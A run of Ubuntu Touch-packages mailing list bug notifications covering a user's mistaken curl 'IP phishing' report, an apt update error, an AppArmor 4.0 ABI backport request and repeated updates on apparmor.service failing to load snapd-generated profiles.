profile is not planned are listed below, whilst the list of packages that require
[Touch-packages] [Bug 2034449] Re: IP phising
Thank you for using Ubuntu and taking the time to report a bug. Your report should contain, at a minimum, the following information so we can better find the source of the bug and work to resolve it. Submitting the bug about the proper source package is essential. For help see https://wiki.ubuntu.com/Bugs/FindRightPackage . Additionally, in the report please include: 1) The release of Ubuntu you are using, via 'cat /etc/lsb-release' or System -> About Ubuntu. 2) The version of the package you are using, via 'dpkg -l PKGNAME | cat' or by checking in Synaptic. 3) What happened and what you expected to happen. The Ubuntu community has also created debugging procedures for a wide variety of packages at https://wiki.ubuntu.com/DebuggingProcedures . Following the debugging instructions for the affected package will make your bug report much more complete. Thanks! ** Information type changed from Private Security to Public ** Changed in: curl (Ubuntu) Status: New => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to curl in Ubuntu. https://bugs.launchpad.net/bugs/2034449 Title: IP phising Status in curl package in Ubuntu: Invalid Bug description: good afternoon I am writing to you because I have found some serious bugs about IPs in Ubuntu... I was trying to access the IPs of several different pages through the terminal with the Curl, wget and dig commands and I always got the same IP... I put it in the Firefox search engine to find out which page it was and the search engine warned me that it was a malicious page so naturally I did not enter it.the IP is this :90.169.41.164 so obviously I am suspicious. Translated with www.DeepL.com/Translator (free version) ProblemType: Bug DistroRelease: Ubuntu 23.04 Package: curl 7.88.1-8ubuntu2.1 ProcVersionSignature: Ubuntu 6.2.0-32.32-generic 6.2.16 Uname: Linux 6.2.0-32-generic x86_64 ApportVersion: 2.26.1-0ubuntu2 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Wed Sep 6 00:00:39 2023 InstallationDate: Installed on 2023-08-06 (30 days ago) InstallationMedia: Ubuntu 23.04 "Lunar Lobster" - Release amd64 (20230418) ProcEnviron: LANG=es_ES.UTF-8 PATH=(custom, no user) SHELL=/bin/bash TERM=xterm-256color XDG_RUNTIME_DIR= SourcePackage: curl UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/curl/+bug/2034449/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2034133] Re: i cant update ubuntu
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/2034133 Title: i cant update ubuntu Status in apt package in Ubuntu: New Bug description: sudo apt-get update Obj:1 http://es.archive.ubuntu.com/ubuntu lunar InRelease Obj:2 https://dl.winehq.org/wine-builds/ubuntu lunar InRelease Obj:3 http://es.archive.ubuntu.com/ubuntu lunar-updates InRelease Obj:4 http://es.archive.ubuntu.com/ubuntu lunar-backports InRelease Obj:5 http://es.archive.ubuntu.com/ubuntu lunar-security InRelease Obj:6 http://security.ubuntu.com/ubuntu lunar-security InRelease Obj:7 http://es.archive.ubuntu.com/ubuntu lunar-proposed InRelease Ign:8 https://ppa.launchpadcontent.net/costales/yaru-colors-folder-color/ubuntu lunar InRelease Err:9 https://ppa.launchpadcontent.net/costales/yaru-colors-folder-color/ubuntu lunar Release 404 Not Found [IP: 185.125.190.52 443] Leyendo lista de paquetes... Hecho E: El repositorio «https://ppa.launchpadcontent.net/costales/yaru-colors-folder-color/ubuntu lunar Release» no tiene un fichero de Publicación. N: No se puede actualizar de un repositorio como este de forma segura y por tanto está deshabilitado por omisión. N: Vea la página de manual apt-secure(8) para los detalles sobre la creación de repositorios y la configuración de usuarios. ProblemType: Bug DistroRelease: Ubuntu 23.04 Package: apt 2.6.0ubuntu0.1 ProcVersionSignature: Ubuntu 6.2.0-32.32-generic 6.2.16 Uname: Linux 6.2.0-32-generic x86_64 ApportVersion: 2.26.1-0ubuntu2 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Tue Sep 5 12:12:29 2023 InstallationDate: Installed on 2023-08-06 (29 days ago) InstallationMedia: Ubuntu 23.04 "Lunar Lobster" - Release amd64 (20230418) ProcEnviron: LANG=es_ES.UTF-8 PATH=(custom, no user) SHELL=/bin/bash TERM=xterm-256color XDG_RUNTIME_DIR= SourcePackage: apt UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2034133/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2026227] [NEW] Backport 4.0 ABI for AppArmor 3 in mantic
Public bug reported: To support the use of AppArmor policies that specify features like userns, add the new 4.0 ABI from upstream https://gitlab.com/apparmor/apparmor/-/merge_requests/1061. Note this should not be enabled by default (as the existing AppArmor profiles have not been updated to account for this) but it will allow easier testing of profiles that want to support this new ABI. Also note this ABI is identical to that provided by the kernel in mantic and lunar currently: # lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description:Ubuntu Mantic Minotaur (development branch) Release:23.10 Codename: mantic # uname -a Linux sec-mantic-amd64 6.3.0-7-generic #7-Ubuntu SMP PREEMPT_DYNAMIC Thu Jun 8 16:02:30 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux # diff /etc/apparmor.d/abi/4.0 <(aa-features-abi -x) # md5sum /etc/apparmor.d/abi/4.0 <(aa-features-abi -x) f17b0a97806d733b5b884d8a1c2fea37 /etc/apparmor.d/abi/4.0 f17b0a97806d733b5b884d8a1c2fea37 /dev/fd/63 ** Affects: apparmor (Ubuntu) Importance: Undecided Assignee: Alex Murray (alexmurray) Status: New ** Affects: apparmor (Ubuntu Mantic) Importance: Undecided Assignee: Alex Murray (alexmurray) Status: New ** Changed in: apparmor (Ubuntu) Assignee: (unassigned) => Alex Murray (alexmurray) ** Also affects: apparmor (Ubuntu Mantic) Importance: Undecided Assignee: Alex Murray (alexmurray) Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2026227 Title: Backport 4.0 ABI for AppArmor 3 in mantic Status in apparmor package in Ubuntu: New Status in apparmor source package in Mantic: New Bug description: To support the use of AppArmor policies that specify features like userns, add the new 4.0 ABI from upstream https://gitlab.com/apparmor/apparmor/-/merge_requests/1061. Note this should not be enabled by default (as the existing AppArmor profiles have not been updated to account for this) but it will allow easier testing of profiles that want to support this new ABI. Also note this ABI is identical to that provided by the kernel in mantic and lunar currently: # lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Mantic Minotaur (development branch) Release: 23.10 Codename: mantic # uname -a Linux sec-mantic-amd64 6.3.0-7-generic #7-Ubuntu SMP PREEMPT_DYNAMIC Thu Jun 8 16:02:30 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux # diff /etc/apparmor.d/abi/4.0 <(aa-features-abi -x) # md5sum /etc/apparmor.d/abi/4.0 <(aa-features-abi -x) f17b0a97806d733b5b884d8a1c2fea37 /etc/apparmor.d/abi/4.0 f17b0a97806d733b5b884d8a1c2fea37 /dev/fd/63 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2026227/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Patch added: "bionic debdiff with corrected version number" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682930/+files/apparmor_2.12-4ubuntu5.3.debdiff ** Patch removed: "debdiff for bionic" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682828/+files/apparmor_2.12-4ubuntu5.2.debdiff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2024637 Title: apparmor.service tries to load snapd generated apparmor profiles but fails Status in apparmor package in Ubuntu: New Status in snapd package in Ubuntu: New Status in apparmor source package in Xenial: In Progress Status in snapd source package in Xenial: New Status in apparmor source package in Bionic: In Progress Status in snapd source package in Bionic: New Bug description: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
It turns out there was already an upload of apparmor 2.12-4ubuntu5.2 to bionic-proposed that got rejected (https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1703821/comments/15), so this update will instead need to skip this version number and use 2.12-4ubuntu5.3 instead. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2024637 Title: apparmor.service tries to load snapd generated apparmor profiles but fails Status in apparmor package in Ubuntu: New Status in snapd package in Ubuntu: New Status in apparmor source package in Xenial: In Progress Status in snapd source package in Xenial: New Status in apparmor source package in Bionic: In Progress Status in snapd source package in Bionic: New Bug description: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Patch added: "xenial debdiff" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682832/+files/apparmor_2.10.95-0ubuntu2.12.debdiff ** Changed in: apparmor (Ubuntu Xenial) Importance: Undecided => High ** Changed in: apparmor (Ubuntu Bionic) Importance: Undecided => High ** Changed in: apparmor (Ubuntu Xenial) Assignee: (unassigned) => Alex Murray (alexmurray) ** Changed in: apparmor (Ubuntu Bionic) Assignee: (unassigned) => Alex Murray (alexmurray) ** Changed in: apparmor (Ubuntu Xenial) Status: New => In Progress ** Changed in: apparmor (Ubuntu Bionic) Status: New => In Progress -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2024637 Title: apparmor.service tries to load snapd generated apparmor profiles but fails Status in apparmor package in Ubuntu: New Status in snapd package in Ubuntu: New Status in apparmor source package in Xenial: In Progress Status in snapd source package in Xenial: New Status in apparmor source package in Bionic: In Progress Status in snapd source package in Bionic: New Bug description: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Patch added: "debdiff for bionic" https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682828/+files/apparmor_2.12-4ubuntu5.2.debdiff -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2024637 Title: apparmor.service tries to load snapd generated apparmor profiles but fails Status in apparmor package in Ubuntu: New Status in snapd package in Ubuntu: New Status in apparmor source package in Xenial: New Status in snapd source package in Xenial: New Status in apparmor source package in Bionic: New Status in snapd source package in Bionic: New Bug description: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
A possible fix on the snapd side is being prepared in tandem in https://github.com/snapcore/snapd/pull/12909 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2024637 Title: apparmor.service tries to load snapd generated apparmor profiles but fails Status in apparmor package in Ubuntu: New Status in snapd package in Ubuntu: New Status in apparmor source package in Xenial: New Status in snapd source package in Xenial: New Status in apparmor source package in Bionic: New Status in snapd source package in Bionic: New Bug description: As of snapd 2.60, when installed as a snap, snapd includes its own vendored apparmor_parser and configuration. As such, it generates profiles using newer apparmor features than the system installed apparmor may support. This is seen as a failure to load the apparmor.service at boot once this new snapd snap with the vendored apparmor is installed: root@sec-bionic-amd64:~# systemctl status apparmor ● apparmor.service - AppArmor initialization Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled) Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago Docs: man:apparmor(7) http://wiki.apparmor.net/ Main PID: 1590 (code=exited, status=123) Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf. Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:...fail! Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'. Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization. root@sec-bionic-amd64:~# snap version snap2.60 snapd 2.60 series 16 ubuntu 18.04 kernel 4.15.0-212-generic root@sec-bionic-amd64:~# snap debug sandbox-features --required \ apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor snapd has internal vendored apparmor In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor profiles generated by snapd as since snapd 2.44.3 it has shipped the snapd.apparmor.service unit which loads its apparmor profiles on boot. apparmor in bionic and xenial should be updated to stop loading snapd generated apparmor profiles and instead leave this up to snapd.apparmor.service. ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: apparmor 2.12-4ubuntu5.1 ProcVersionSignature: Ubuntu 4.15.0-212.223-generic 4.15.18 Uname: Linux 4.15.0-212-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.29 Architecture: amd64 Date: Thu Jun 22 06:52:02 2023 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdline: BOOT_IMAGE=/boot/vmlinuz-4.15.0-212-generic root=UUID=da79cdd1-11be-4719-8482-46ce30623eaa ro quiet splash console=tty1 console=ttyS0 vt.handoff=1 PstreeP: Error: [Errno 2] No such file or directory: '/usr/bin/pstree': '/usr/bin/pstree' SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: 